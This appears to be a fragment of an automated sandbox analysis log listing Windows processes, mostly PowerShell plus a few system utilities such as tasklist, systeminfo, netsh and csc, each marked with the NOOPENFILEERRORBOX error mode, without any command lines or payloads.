Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
